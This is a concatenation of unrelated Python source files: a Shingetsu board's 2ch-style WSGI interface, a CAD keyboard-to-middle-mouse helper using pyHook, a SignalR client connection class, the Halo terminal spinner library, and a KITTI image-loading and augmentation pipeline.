isopen = (env['shingetsu.isadmin'] or env['shingetsu.isfriend']
or env['shingetsu.isvisitor'])
utils.log_request(env)
path = env.get('PATH_INFO', '')
if not isopen:
resp('403 Forbidden', [('Content-Type', 'text/plain')])
return [b'403 Forbidden']
routes = [
(board_re, board_app),
(subject_re, subject_app),
(thread_re, thread_app),
(post_comment_re, post.post_comment_app),
(head_re, head_app)
]
try:
for (route, app) in routes:
m = route.match(path)
if m:
env['mch.path_match'] = m
return app(env, resp)
except keylib.DatkeyNotFound:
pass
resp("404 Not Found", [('Content-Type', 'text/plain')])
return [b'404 Not Found']
def check_get_cache(env):
if not (env['shingetsu.isfriend'] or env['shingetsu.isadmin']):
return False
agent = env.get("HTTP_USER_AGENT", "")
if re.search(config.robot, agent):
return False
return True
_lock = threading.Lock()
_update_counter = collections.defaultdict(int)
_UPDATE_COUNT = 4 # once every _UPDATE_COUNT times
def _count_is_update(thread_key):
with _lock:
try:
_update_counter[thread_key] += 1
return _update_counter[thread_key] == _UPDATE_COUNT
finally:
_update_counter[thread_key] %= _UPDATE_COUNT
def board_app(env, resp):
path = env['PATH_INFO']
m = board_re.match(path)
board = m.group(1)
message = gateway.search_message(env.get('HTTP_ACCEPT_LANGUAGE', 'ja'))
headers = Headers([('Content-Type', 'text/html; charset=Shift_JIS')])
resp("200 OK", headers.items())
board = utils.sanitize(utils.get_board(path))
if board:
fmt = '{logo} - {board} - {desc}'
else:
fmt = '{logo} - {desc}'
text = fmt.format(logo=message['logo'], desc=message['description'], board=board)
html = '''
<!DOCTYPE html>
<html><head>
<meta http-equiv="content-type" content="text/html; charset=Shift_JIS">
<title>{text}</title>
<meta name="description" content="{text}">
</head><body>
<h1>{text}</h1>
</body></html>
'''.format(text=text)
return [html.encode('cp932', 'replace')]
def thread_app(env, resp):
path = env['PATH_INFO']
# utils.log('thread_app', path)
m = thread_re.match(path)
board, datkey = m.group(1), m.group(2)
key = keylib.get_filekey(datkey)
data = cache.Cache(key)
data.load()
if check_get_cache(env):
if not data.exists() or len(data) == 0:
# when first access, load data from network
data.search()
elif _count_is_update(key):
# update thread
# limit `data.search` calling. it's slow!
threading.Thread(target=data.search, daemon=True).start()
if not data.exists():
resp('404 Not Found', [('Content-Type', 'text/plain; charset=Shift_JIS')])
return [b'404 Not Found']
thread = dat.make_dat(data, env, board)
headers = Headers([('Content-Type', 'text/plain; charset=Shift_JIS')])
last_m = eutils.formatdate(data.stamp)
headers['Last-Modified'] = last_m
resp("200 OK", headers.items())
return (c.encode('cp932', 'replace') for c in thread)
def make_subject_cachelist(board):
"""Make RecentList&CacheList"""
recentlist = cache.RecentList()
cachelist = cache.CacheList()
seen = set(c.datfile for c in cachelist)
result = cachelist
for rec in recentlist:
if rec.datfile not in seen:
seen.add(rec.datfile)
c = cache.Cache(rec.datfile)
c.recent_stamp = rec.stamp
result.append(c)
result = [c for c in result if c.type == 'thread']
# same as order recent page
result.sort(key=lambda c: c.recent_stamp, reverse=True)
if board is not None:
sugtags = tag.SuggestedTagTable()
result = [c for c in result if has_tag(c, board, sugtags)]
return result
def subject_app(env, resp):
# utils.log('subject_app')
path = env['PATH_INFO']
# board is `title.file_encode`ed
# example: 2ch_E99B91E8AB87(雑談)
board = env['mch.path_match'].group(1)
m = re.match('2ch_(\S+)', board)
if not (board.startswith('2ch') or m):
resp("404 Not Found", [('Content-Type', 'text/plain')])
return [b'404 Not Found']
board_encoded = m and title.str_decode(m.group(1))
if board_encoded:
# such as '雑談', 'ニュース', etc...
board_name = title.file_decode('dummy_' + board_encoded)
else:
board_name = None
subjects, last_stamp = make_subject(env, board_name)
resp('200 OK', [('Content-Type', 'text/plain; charset=Shift_JIS'),
('Last-Modified', eutils.formatdate(last_stamp))])
return (s.encode('cp932', 'replace') for s in subjects)
def make_subject(env, board):
load_from_net = check_get_cache(env)
subjects = []
cachelist = make_subject_cachelist(board)
last_stamp = 0
for c in cachelist:
if not load_from_net and len(c) == 0:
# Because you don't have a permission of getting data from network,
# don't need to look a thread that don't have records.
continue
if last_stamp < c.stamp:
last_stamp = c.stamp
try:
key = keylib.get_datkey(c.datfile)
except keylib.DatkeyNotFound:
continue
title_str = title.file_decode(c.datfile)
if title_str is not None:
title_str = title_str.replace('\n', '')
subjects.append('{key}.dat<>{title} ({num})\n'.format(
key=key,
title=title_str,
num=len(c)))
return subjects, last_stamp
def has_tag(c, board, sugtags):
tags = c.tags
if c.datfile in sugtags:
tags += sugtags[c.datfile]
return board in (str(t) for t in tags)
def head_app(env, resp):
resp('200 OK', [('Content-Type', 'text/plain; charset=Shift_JIS')])
body = []
with open(config.motd, encoding='utf-8', errors='replace') as f:
for line in f:
body.append(line.rstrip('\n') + '<br>\n')
return [''.join(body).encode('cp932', 'replace')]
class Datd(threading.Thread):
def __init__(self, *args, **kwds):
super(Datd, self).__init__(*args, **kwds)
self._port = config.dat_port
def run(self):
utils.log('start 2ch interface')
keylib.load()
try:
import waitress
except ImportError:
utils.log('use wsgiref')
class Server(socketserver.ThreadingMixIn,
simple_server.WSGIServer):
pass
_server = simple_server.make_server('', self._port, dat_app,
server_class=Server)
_server.serve_forever()
else:
utils.log('use waitress')
waitress.serve(dat_app, host='', port=self._port)
|
main.py
|
import pythoncom
import pyHook
import pyautogui
import win32ui
import threading
import time
import win32gui
import win32com.client
import sys
# pyHook must be manually added!
# https://www.lfd.uci.edu/~gohlke/pythonlibs/#pyhook
# Download the file corresponding to the python version being used (I'm using 3.6.6)
# pip install
exit_prompt_given = False
middle_btn_state = False
l_ctrl_state = False
outside_key_count = 0
commonCADSoftware = ["solidedge", "solidworks", "autodeskautocad"]
def OnKeyboardEvent(event):
global exit_prompt_given
if exit_prompt_given or event.WindowName is None: # occurs when program is closing
return True
global outside_key_count
global l_ctrl_state
global middle_btn_state
# only work if common CAD software is being used.
identifier = event.WindowName.lower().replace(" ", "")
isCADWindow = False
for s in commonCADSoftware:
if identifier.startswith(s):
isCADWindow = True
break
# Oem_3 is the '`' key, or lowercase '~'. Key near top left of keyboard
if event.Key == "Oem_3":
new_state = event.MessageName == "key down"
if new_state != middle_btn_state:
# the button state has been toggled!
middle_btn_state = new_state
if middle_btn_state and l_ctrl_state:
# no need to release middle mouse button before exiting
# the program is being exited before the button is pressed down
exit_with_prompt("")
if isCADWindow:
# change middle mouse button state based on keyboard button state
if middle_btn_state:
pyautogui.mouseDown(button='middle')
else:
pyautogui.mouseUp(button='middle')
elif event.Key == "Lcontrol":
l_ctrl_state = event.MessageName == "key down"
if l_ctrl_state and middle_btn_state:
# release button before exiting.
pyautogui.mouseUp(button='middle')
exit_with_prompt("")
if not isCADWindow:
outside_key_count += 1
# increment key count if solid edge is not in focus
if outside_key_count >= 150:
exit_with_prompt("You may have accidentally forgotten that this program is running.\n")
else :
outside_key_count = 0 # reset outside key count once CAD software is being used
return True
"""
In order:
-Makes all other key inputs ignored (by setting exit_prompt_given)
-Open dialog box in thread
-While thread is running, elevate the dialog
-Join. Wait for dialog to close
-Exit
"""
def exit_with_prompt(prefix):
global exit_prompt_given
exit_prompt_given = True
dialog_title = "Mouse Util"
t = threading.Thread(target=_message_thread, args=(dialog_title, prefix + "The program is exiting."))
t.start()
time.sleep(0.1)
win32gui.EnumWindows(_prompt_enum_handle, dialog_title)
t.join()
sys.exit()
# run within thread, because message box locks thread until it is closed
def _message_thread(title, text):
win32ui.MessageBox(text, title)
def _prompt_enum_handle(hwnd, title):
if win32gui.GetWindowText(hwnd) == title and win32gui.GetClassName(hwnd) == "#32770":
# https://stackoverflow.com/a/30314197/5458478
# ¯\_(ツ)_/¯
win32com.client.Dispatch("WScript.Shell").SendKeys('%')
win32gui.SetForegroundWindow(hwnd)
hm = pyHook.HookManager()
# get both key up and key down events
hm.KeyDown = OnKeyboardEvent
hm.KeyUp = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()
|
_connection.py
|
import json
import sys
from threading import Thread
from signalr.events import EventHook
from signalr.hubs import Hub
from signalr.transports import AutoTransport
class Connection:
protocol_version = '1.5'
def __init__(self, url, session):
self.url = url
self.__hubs = {}
self.qs = {}
self.__send_counter = -1
self.token = None
self.id = None
self.data = None
self.received = EventHook()
self.error = EventHook()
self.starting = EventHook()
self.stopping = EventHook()
self.exception = EventHook()
self.is_open = False
self.__transport = AutoTransport(session, self)
self.__listener_thread = None
self.started = False
def handle_error(**kwargs):
error = kwargs["E"] if "E" in kwargs else None
if error is None:
return
self.error.fire(error)
self.received += handle_error
self.starting += self.__set_data
def __set_data(self):
self.data = json.dumps([{'name': hub_name} for hub_name in self.__hubs])
def increment_send_counter(self):
self.__send_counter += 1
return self.__send_counter
def start(self):
self.starting.fire()
negotiate_data = self.__transport.negotiate()
self.token = negotiate_data['ConnectionToken']
self.id = negotiate_data['ConnectionId']
listener = self.__transport.start()
def wrapped_listener():
while self.is_open:
try:
listener()
except:
self.exception.fire(*sys.exc_info())
self.is_open = False
self.is_open = True
self.__listener_thread = Thread(target=wrapped_listener)
self.__listener_thread.start()
self.started = True
def wait(self, timeout=30):
Thread.join(self.__listener_thread, timeout)
def send(self, data):
self.__transport.send(data)
def close(self):
self.is_open = False
self.__transport.close()
self.__listener_thread.join()
def register_hub(self, name):
if name not in self.__hubs:
if self.started:
raise RuntimeError(
'Cannot create new hub because connection is already started.')
self.__hubs[name] = Hub(name, self)
return self.__hubs[name]
def hub(self, name):
return self.__hubs[name]
def __enter__(self):
self.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
|
halo.py
|
# -*- coding: utf-8 -*-
# pylint: disable=unsubscriptable-object
"""Beautiful terminal spinners in Python.
"""
from __future__ import unicode_literals, absolute_import
import sys
import threading
import time
import functools
import atexit
import cursor
from spinners.spinners import Spinners
from log_symbols.symbols import LogSymbols
from halo._utils import is_supported, colored_frame, is_text_type, decode_utf_8_text, get_terminal_columns, \
get_environment
class Halo(object):
"""Halo library.
Attributes
----------
CLEAR_LINE : str
Code to clear the line
"""
CLEAR_LINE = '\033[K'
SPINNER_PLACEMENTS = ('left', 'right',)
def __init__(self, text='', color='cyan', spinner=None,
animation=None, placement='left', interval=-1, enabled=True, stream=sys.stdout):
"""Constructs the Halo object.
Parameters
----------
text : str, optional
Text to display.
color : str, optional
Color of the text to display.
spinner : str|dict, optional
String or dictionary representing spinner. String can be one of 60+ spinners
supported.
animation: str, optional
Animation to apply if text is too large. Can be one of `bounce`, `marquee`.
Defaults to ellipses.
placement: str, optional
Side of the text to place the spinner on. Can be `left` or `right`.
Defaults to `left`.
interval : integer, optional
Interval between each frame of the spinner in milliseconds.
enabled : boolean, optional
Spinner enabled or not.
stream : io, optional
Output.
"""
self._color = color
self._animation = animation
self.spinner = spinner
self.text = text
self._interval = int(interval) if int(interval) > 0 else self._spinner['interval']
self._stream = stream
self.placement = placement
self._frame_index = 0
self._text_index = 0
self._spinner_thread = None
self._stop_spinner = None
self._spinner_id = None
self._enabled = enabled # Need to check for stream
environment = get_environment()
def clean_up():
"""Handle cell execution"""
self.stop()
if environment in ('ipython', 'jupyter'):
from IPython import get_ipython
ip = get_ipython()
ip.events.register('post_run_cell', clean_up)
elif environment == 'terminal':
atexit.register(clean_up)
def __enter__(self):
"""Starts the spinner on a separate thread. For use in context managers.
Returns
-------
self
"""
return self.start()
def __exit__(self, type, value, traceback):
"""Stops the spinner. For use in context managers.
Returns
-------
None
"""
return self.stop()
def __call__(self, f):
"""Allow the Halo object to be used as a regular function decorator."""
@functools.wraps(f)
def wrapped(*args, **kwargs):
with self:
return f(*args, **kwargs)
return wrapped
@property
def spinner(self):
"""Getter for spinner property.
Returns
-------
dict
spinner value
"""
return self._spinner
@spinner.setter
def spinner(self, spinner=None):
"""Setter for spinner property.
Parameters
----------
spinner : dict, str
Defines the spinner value with frame and interval
"""
self._spinner = self._get_spinner(spinner)
self._frame_index = 0
self._text_index = 0
@property
def text(self):
"""Getter for text property.
Returns
-------
str
text value
"""
return self._text['original']
@text.setter
def text(self, text):
"""Setter for text property.
Parameters
----------
text : str
Defines the text value for spinner
"""
self._text = self._get_text(text)
@property
def color(self):
"""Getter for color property.
Returns
-------
str
color value
"""
return self._color
@color.setter
def color(self, color):
"""Setter for color property.
Parameters
----------
color : str
Defines the color value for spinner
"""
self._color = color
@property
def placement(self):
"""Getter for placement property.
Returns
-------
str
spinner placement
"""
return self._placement
@placement.setter
def placement(self, placement):
"""Setter for placement property.
Parameters
----------
placement: str
Defines the placement of the spinner
"""
if placement not in self.SPINNER_PLACEMENTS:
raise ValueError(
"Unknown spinner placement '{0}', available are {1}".format(placement, self.SPINNER_PLACEMENTS))
self._placement = placement
@property
def spinner_id(self):
"""Getter for spinner id
Returns
-------
str
Spinner id value
"""
return self._spinner_id
@property
def animation(self):
"""Getter for animation property.
Returns
-------
str
Spinner animation
"""
return self._animation
@animation.setter
def animation(self, animation):
"""Setter for animation property.
Parameters
----------
animation: str
Defines the animation of the spinner
"""
self._animation = animation
self._text = self._get_text(self._text['original'])
def _get_spinner(self, spinner):
"""Extracts spinner value from options and returns value
containing spinner frames and interval, defaults to 'dots' spinner.
Parameters
----------
spinner : dict, str
Contains spinner value or type of spinner to be used
Returns
-------
dict
Contains frames and interval defining spinner
"""
default_spinner = Spinners['dots'].value
if spinner and type(spinner) == dict:
return spinner
if is_supported():
if all([is_text_type(spinner), spinner in Spinners.__members__]):
return Spinners[spinner].value
else:
return default_spinner
else:
return Spinners['line'].value
def _get_text(self, text):
"""Creates frames based on the selected animation
Returns
-------
self
"""
animation = self._animation
stripped_text = text.strip()
# Check which frame of the animation is the widest
max_spinner_length = max([len(i) for i in self._spinner['frames']])
# Subtract to the current terminal size the max spinner length
# (-1 to leave room for the extra space between spinner and text)
terminal_width = get_terminal_columns() - max_spinner_length - 1
text_length = len(stripped_text)
frames = []
if terminal_width < text_length and animation:
if animation == 'bounce':
"""
Make the text bounce back and forth
"""
for x in range(0, text_length - terminal_width + 1):
frames.append(stripped_text[x:terminal_width + x])
frames.extend(list(reversed(frames)))
elif 'marquee':
"""
Make the text scroll like a marquee
"""
stripped_text = stripped_text + ' ' + stripped_text[:terminal_width]
for x in range(0, text_length + 1):
frames.append(stripped_text[x:terminal_width + x])
elif terminal_width < text_length and not animation:
# Add ellipsis if text is larger than terminal width and no animation was specified
frames = [stripped_text[:terminal_width - 6] + ' (...)']
else:
frames = [stripped_text]
return {
'original': text,
'frames': frames
}
def clear(self):
"""Clears the line and returns cursor to the start.
of line
Returns
-------
self
"""
if not self._enabled:
return self
self._stream.write('\r')
self._stream.write(self.CLEAR_LINE)
return self
def _render_frame(self):
"""Renders the frame on the line after clearing it.
"""
frame = self.frame()
output = '\r{0}'.format(frame)
self.clear()
self._stream.write(output)
def render(self):
"""Runs the render until thread flag is set.
Returns
-------
self
"""
while not self._stop_spinner.is_set():
self._render_frame()
time.sleep(0.001 * self._interval)
return self
def frame(self):
"""Builds and returns the frame to be rendered
Returns
-------
self
"""
frames = self._spinner['frames']
frame = frames[self._frame_index]
if self._color:
frame = colored_frame(frame, self._color)
self._frame_index += 1
self._frame_index = self._frame_index % len(frames)
text_frame = self.text_frame()
return u'{0} {1}'.format(*[
(text_frame, frame)
if self._placement == 'right' else
(frame, text_frame)
][0])
def text_frame(self):
"""Builds and returns the text frame to be rendered
Returns
-------
self
"""
if len(self._text['frames']) == 1:
# Return first frame (can't return original text because at this point it might be ellipsed)
return self._text['frames'][0]
frames = self._text['frames']
frame = frames[self._text_index]
self._text_index += 1
self._text_index = self._text_index % len(frames)
return frame
def start(self, text=None):
"""Starts the spinner on a separate thread.
Parameters
----------
text : None, optional
Text to be used alongside spinner
Returns
-------
self
"""
if text is not None:
self.text = text
if not self._enabled or self._spinner_id is not None:
return self
if self._stream.isatty():
cursor.hide(stream=self._stream)
self._stop_spinner = threading.Event()
self._spinner_thread = threading.Thread(target=self.render)
self._spinner_thread.setDaemon(True)
self._render_frame()
self._spinner_id = self._spinner_thread.name
self._spinner_thread.start()
return self
def stop(self):
"""Stops the spinner and clears the line.
Returns
-------
self
"""
if not self._enabled:
return self
if self._spinner_thread:
self._stop_spinner.set()
self._spinner_thread.join()
self._frame_index = 0
self._spinner_id = None
self.clear()
if self._stream.isatty():
cursor.show(stream=self._stream)
return self
def succeed(self, text=None):
"""Shows and persists success symbol and text and exits.
Parameters
----------
text : None, optional
Text to be shown alongside success symbol.
Returns
-------
self
"""
return self.stop_and_persist(symbol=LogSymbols.SUCCESS.value, text=text)
def fail(self, text=None):
"""Shows and persists fail symbol and text and exits.
Parameters
----------
text : None, optional
Text to be shown alongside fail symbol.
Returns
-------
self
"""
return self.stop_and_persist(symbol=LogSymbols.ERROR.value, text=text)
def warn(self, text=None):
"""Shows and persists warn symbol and text and exits.
Parameters
----------
text : None, optional
Text to be shown alongside warn symbol.
Returns
-------
self
"""
return self.stop_and_persist(symbol=LogSymbols.WARNING.value, text=text)
def info(self, text=None):
"""Shows and persists info symbol and text and exits.
Parameters
----------
text : None, optional
Text to be shown alongside info symbol.
Returns
-------
self
"""
return self.stop_and_persist(symbol=LogSymbols.INFO.value, text=text)
def stop_and_persist(self, symbol=' ', text=None):
"""Stops the spinner and persists the final frame to be shown.
Parameters
----------
symbol : str, optional
Symbol to be shown in final frame
text: str, optional
Text to be shown in final frame
Returns
-------
self
"""
if not self._enabled:
return self
symbol = decode_utf_8_text(symbol)
if text is not None:
text = decode_utf_8_text(text)
else:
text = self._text['original']
text = text.strip()
self.stop()
output = u'{0} {1}\n'.format(*[
(text, symbol)
if self._placement == 'right' else
(symbol, text)
][0])
self._stream.write(output)
return self
|
kitti_input.py
|
import matplotlib
import itertools
import os
import random
from PIL import Image, ImageEnhance
import numpy as np
import matplotlib.pyplot as plt
import imageio
import tensorflow as tf
from include.utils.data_utils import (annotation_to_h5)
from include.utils.annolist import AnnotationLib as AnnoLib
import threading
from collections import namedtuple
import logging
import json
# nametuple 继承于tuple
# 定义一个nametuple类型的fake_anno_object,包含rects属性
fake_anno = namedtuple('fake_anno_object', ['rects'])
matplotlib.use('Agg')
def _noise(image):
if np.random.uniform() < 0.5:
return image
scale = np.random.uniform(0, 32)
noise = np.random.normal(-scale, scale, size=image.shape)
image_new = np.clip(image.astype(np.float32) +
noise, 0, 255).astype(np.uint8)
return image_new
# 图像增强
def _enhance(image):
if np.random.uniform() < 0.5:
return image
# 实现array到image的转换
image_obj = Image.fromarray(image)
# PIL image转换成array
# img = np.asarray(image_obj)
# 颜色增强
image_obj = ImageEnhance.Color(image_obj).enhance(np.random.uniform(0.5, 1.5))
# 亮度增强
image_obj = ImageEnhance.Brightness(image_obj).enhance(np.random.uniform(0.7, 1.3))
# 对比度增强
image_obj = ImageEnhance.Contrast(image_obj).enhance(np.random.uniform(0.7, 1.3))
# img = np.array(image_obj)
img = np.asarray(image_obj)
return img
def _projection(point, calib):
point_r = np.reshape(point, (3, ))
point_exp = np.reshape([point_r[0], point_r[1], point_r[2], 1], (4, 1))
point_proj = np.dot(calib, point_exp)
point_proj = point_proj[:2] / point_proj[2]
return np.reshape(point_proj, (2, ))
def _vis(im_obj, anno, index):
plt.figure(figsize=(12, 4))
# 截取函数,限定到范围0-255
plt.imshow(np.clip(im_obj, 0, 255).astype(np.int32))
for r in anno.rects:
if r.classID == -1:
continue
plt.plot([r.x1, r.x2, r.x2, r.x1, r.x1],
[r.y1, r.y1, r.y2, r.y2, r.y1])
bottom_proj = _projection([r.x_3d, r.y_3d, r.z_3d], r.calib)
plt.scatter(bottom_proj[0], bottom_proj[1])
plt.show()
plt.savefig('/home/yappedyen/{}'.format(index))
plt.close()
return
# 图像做一个起伏
def _jitter(im_obj, anno, jitter_pixel=24):
im = np.array(im_obj)
trans = np.random.normal(scale=jitter_pixel, size=(2, ))
height_jitter, width_jitter = np.clip(trans,
a_min=-jitter_pixel * 2,
a_max=+jitter_pixel * 2).astype(np.int32)
image_jitter = np.zeros(shape=np.shape(im), dtype=np.uint8)
image_means = im.mean(axis=(0, 1), keepdims=True).astype(np.uint8)
image_jitter += image_means
height, width, channels = np.shape(im)
left_new = max(0, width_jitter)
left_ori = max(0, -width_jitter)
right_new = min(width + width_jitter, width)
right_ori = min(width - width_jitter, width)
top_new = max(0, height_jitter)
top_ori = max(0, -height_jitter)
bottom_new = min(height + height_jitter, height)
bottom_ori = min(height - height_jitter, height)
image_jitter[top_new:bottom_new, left_new:right_new] = im[top_ori:bottom_ori, left_ori:right_ori]
new_rects = []
for r in anno.rects:
focal_length = r.calib.reshape(3, 4)[0, 0]
r.x_3d += r.z_3d * width_jitter / focal_length
r.y_3d += r.z_3d * height_jitter / focal_length
r.x1 = max(r.x1 + width_jitter, 0)
r.x2 = min(r.x2 + width_jitter, width)
r.y1 = max(r.y1 + height_jitter, 0)
r.y2 = min(r.y2 + height_jitter, height)
if r.x1 < r.x2 and r.y1 < r.y2:
new_rects.append(r)
anno.rects = new_rects
return image_jitter, anno
def _flip(im_obj, anno):
if np.random.uniform() < 0.5:
return im_obj, anno
# 左右方向上翻转每行的元素,列保持不变,但是列的显示顺序变了。
im_obj = np.fliplr(im_obj)
height, width, channels = np.shape(im_obj)
for r in anno.rects:
calib = r.calib.reshape((3, 4))
focal_length = calib[0, 0]
ppoint_x = calib[0, 2]
trans_x = calib[0, 3]
delta_x = (r.z_3d*(width-1-2*ppoint_x) - 2*trans_x)/focal_length - 2*r.x_3d
r.x_3d += delta_x
r.x1, r.x2 = (width-1-r.x2, width-1-r.x1)
r.alpha = np.pi - r.alpha if r.alpha > 0 else -np.pi - r.alpha
return im_obj, anno
def read_kitti_anno(label_file, calib_file, detect_truck):
""" Reads a kitti annotation file.
Args:
label_file: Path to file
Returns:
Lists of rectangles: Cars and don't care area.
"""
"""
[['Car', '0.00', '0', '1.89', '561.93', '186.85', '698.62', '273.77',
'1.48', '1.51', '4.35', '0.55', '1.80', '14.99', '1.92'],
['Car', '0.00', '2', '1.65', '805.83', '179.99', '856.66', '218.93',
'1.47', '1.68', '3.88', '9.09', '1.78', '29.59', '1.94']]
"""
labels = [line.rstrip().split(' ') for line in open(label_file)]
# label_file = '/home/l4v/MonoGRNet/data/KittiBox/training/label_2/007474.txt'
# label_file_split = label_file.rstrip().split('/')
# index = label_file_split[-1].split('.')[0]
# import pdb
# pdb.set_trace()
calibs = [line.rstrip().split(' ') for line in open(calib_file)]
assert calibs[2][0] == 'P2:'
"""
[[7.215377e+02 0.000000e+00 6.095593e+02 4.485728e+01]
[0.000000e+00 7.215377e+02 1.728540e+02 2.163791e-01]
[0.000000e+00 0.000000e+00 1.000000e+00 2.745884e-03]]
"""
calib = np.reshape(calibs[2][1:], (3, 4)).astype(np.float32)
# calib_pinv calib伪逆
calib_pinv = np.linalg.pinv(calib)
rect_list = []
for label in labels:
# 只检测 Car/Van/Truck
if not (label[0] == 'Car' or label[0] == 'Van' or
label[0] == 'Truck' or label[0] == 'DontCare'):
continue
notruck = not detect_truck
if notruck and label[0] == 'Truck': # truck不显示
continue
if label[0] == 'DontCare':
class_id = -1
else:
class_id = 1
object_rect = AnnoLib.AnnoRect(
x1=float(label[4]), y1=float(label[5]),
x2=float(label[6]), y2=float(label[7]),
height=float(label[8]), width=float(label[9]),
length=float(label[10]), x=float(label[11]),
y=float(label[12]), z=float(label[13]),
alpha=float(label[14]), calib=calib,
calib_pinv=calib_pinv)
assert object_rect.x1 < object_rect.x2
assert object_rect.y1 < object_rect.y2
object_rect.classID = class_id
# The ground truth rotation (in camera coordinates) is converted to the local coordinates.
view_angle = np.arctan2(object_rect.z_3d, object_rect.x_3d)
object_rect.alpha += view_angle - np.pi * 0.5
rect_list.append(object_rect)
return rect_list
# 改变bbox的大小
def _rescale_boxes(current_shape, anno, target_height, target_width):
x_scale = target_width / float(current_shape[1])
y_scale = target_height / float(current_shape[0])
z_3d_scale = ((x_scale**2 + y_scale**2)*0.5)**0.5
for r in anno.rects:
assert r.x1 < r.x2
r.x1 *= x_scale
r.x2 *= x_scale
assert r.x1 < r.x2
r.y1 *= y_scale
r.y2 *= y_scale
r.xy_scale = np.array([x_scale, y_scale], dtype=np.float32)
return anno
# 生成 mask
def _generate_mask(hypes, ignore_rects):
width = hypes["image_width"]
height = hypes["image_height"]
grid_width = hypes["grid_width"]
grid_height = hypes["grid_height"]
mask = np.ones([grid_height, grid_width])
if not hypes['use_mask']:
return mask
for rect in ignore_rects:
left = int((rect.x1+2)/width*grid_width)
right = int((rect.x2-2)/width*grid_width)
top = int((rect.y1+2)/height*grid_height)
bottom = int((rect.y2-2)/height*grid_height)
for x in range(left, right+1):
for y in range(top, bottom+1):
mask[y, x] = 0
return mask
def _load_kitti_txt(kitti_txt, hypes, jitter=False, random_shuffel=True):
"""
Take the txt file and net configuration and create a generator
that outputs a jittered version of a random image from the annolist
that is mean corrected.
Args:
kitti_txt: path_to_txt
hypes: hypes
jitter: Image preprocessing
random_shuffel: Random sorting of images
"""
# /home/l4v/MonoGRNet/data/KittiBox
base_path = os.path.realpath(os.path.dirname(kitti_txt))
# ['training/image_2/00445.png training/label_2/00445.txt',...,'...']
files = [line.rstrip() for line in open(kitti_txt)]
if hypes['data']['truncate_data']:
files = files[:10]
random.seed(0)
# 无穷迭代器
# 将数据不断读取到队列
for epoch in itertools.count():
if random_shuffel:
# 将序列的所有元素随机排序
random.shuffle(files)
for file in files:
image_file, gt_image_file = file.split(" ") # image_address, label_address
image_file_split = image_file.split('/')
index = image_file_split[-1].split('.')[0] # 007474 image_index
# /home/l4v/MonoGRNet/data/KittiBox/training/calib/007474.txt
calib_file = os.path.join(base_path, image_file_split[0], 'calib', index + '.txt')
# assert false igger exception
assert os.path.exists(calib_file), \
"File does not exist: %s" % calib_file
# /home/l4v/MonoGRNet/data/KittiBox/training/image_2/007474.png
image_file = os.path.join(base_path, image_file)
assert os.path.exists(image_file), \
"File does not exist: %s" % image_file
# /home/l4v/MonoGRNet/data/KittiBox/training/label_2/007474.txt
gt_image_file = os.path.join(base_path, gt_image_file)
assert os.path.exists(gt_image_file), \
"File does not exist: %s" % gt_image_file
# rect_list = [x1,y1,...] 读取label和calib
# 每一张图片注释的矩形框列表
rect_list = read_kitti_anno(gt_image_file, calib_file,
detect_truck=hypes['detect_truck'])
anno = AnnoLib.Annotation()
anno.rects = rect_list
im = imageio.imread(image_file)
if im.shape[2] == 4:
im = im[:, :, :3]
if jitter:
# 图片翻转
im, anno = _flip(im, anno)
# 图片做一个起伏
im, anno = _jitter(im, anno)
# 图片增强并加噪
im = _noise(_enhance(im))
# _vis(im, anno, index)
# 变换图像尺寸
anno = _rescale_boxes(im.shape, anno, hypes["image_height"], hypes["image_width"])
im = Image.fromarray(im).resize(size=(hypes["image_width"], hypes["image_height"]))
# 只关注classid=1的注释
pos_list = [rect for rect in anno.rects if rect.classID == 1]
# 存入nametuple
pos_anno = fake_anno(pos_list)
# boxes: [1, grid_height*grid_width, 11, max_len, 1]
# for each cell, this array contains the ground truth boxes around it (within focus area,
# defined by center distance)
# confs: [1, grid_height*grid_width, 1, max_len, 1]
# record the valid boxes, since max_len is greater than the number of ground truth boxes
boxes, confs, calib, calib_pinv, xy_scale = annotation_to_h5(hypes, pos_anno, hypes["grid_width"],
hypes["grid_height"], hypes["rnn_len"])
# masks are zero in "Don't care" area
mask_list = [rect for rect in anno.rects if rect.classID == -1]
mask = _generate_mask(hypes, mask_list)
boxes = boxes.reshape([hypes["grid_height"], hypes["grid_width"], 11])
confs = confs.reshape(hypes["grid_height"], hypes["grid_width"])
calib = calib.reshape(hypes["grid_height"], hypes["grid_width"], 3, 4)
xy_scale = xy_scale.reshape(hypes["grid_height"], hypes["grid_width"], 2)
calib_pinv = calib_pinv.reshape(hypes['grid_height'], hypes['grid_width'], 4, 3)
# yield 生成器类似于return,但是迭代一次遇到yield时就返回yield后面(右边)的值。
# 重点是:下一次迭代时,从上一次迭代遇到的yield后面的代码(下一行)开始执行。
# 第一次调用时必须先next()或send(None),否则会报错。
# 通过重复调用next()方法,直到捕获一个异常。或者通过迭代(for)从上次位置开始
yield {"image": im, "boxes": boxes, "confs": confs, "calib": calib, "calib_pinv": calib_pinv,
"xy_scale": xy_scale, "rects": pos_list, "mask": mask}
def _make_sparse(n, d):
v = np.zeros((d,), dtype=np.float32)
v[n] = 1.
return v
def create_queues(hypes, phase):
"""Create Queues."""
dtypes = [tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32]
# grid_size = hypes['grid_width'] * hypes['grid_height']
shapes = ([hypes['image_height'], hypes['image_width'], 3], # image
[hypes['grid_height'], hypes['grid_width']], # confs
[hypes['grid_height'], hypes['grid_width'], 11], # boxes的11 个参数
[hypes['grid_height'], hypes['grid_width']], # mask
[hypes['grid_height'], hypes['grid_width'], 3, 4], # calib
[hypes['grid_height'], hypes['grid_width'], 4, 3], # calib_pinv
[hypes['grid_height'], hypes['grid_width'], 2]) # x_scale y_scale 缩放比例
capacity = 32
# 创建一个队列存放数据
q = tf.queue.FIFOQueue(capacity=capacity, dtypes=dtypes, shapes=shapes)
return q
def _processe_image(hypes, image):
# Because these operations are not commutative, consider randomizing
# randomize the order their operation.
augment_level = hypes['augment_level']
if augment_level > 0:
image = tf.image.random_brightness(image, max_delta=30)
image = tf.image.random_contrast(image, lower=0.75, upper=1.25)
if augment_level > 1:
image = tf.image.random_saturation(image, lower=0.5, upper=1.6)
image = tf.image.random_hue(image, max_delta=0.15)
# 返回最小值
image = tf.minimum(image, 255.0)
image = tf.maximum(image, 0)
return image
def start_enqueuing_threads(hypes, q, phase, sess):
"""Start enqueuing threads."""
# Creating Placeholder for the Queue
# 占位符
x_in = tf.placeholder(tf.float32)
confs_in = tf.placeholder(tf.float32)
boxes_in = tf.placeholder(tf.float32)
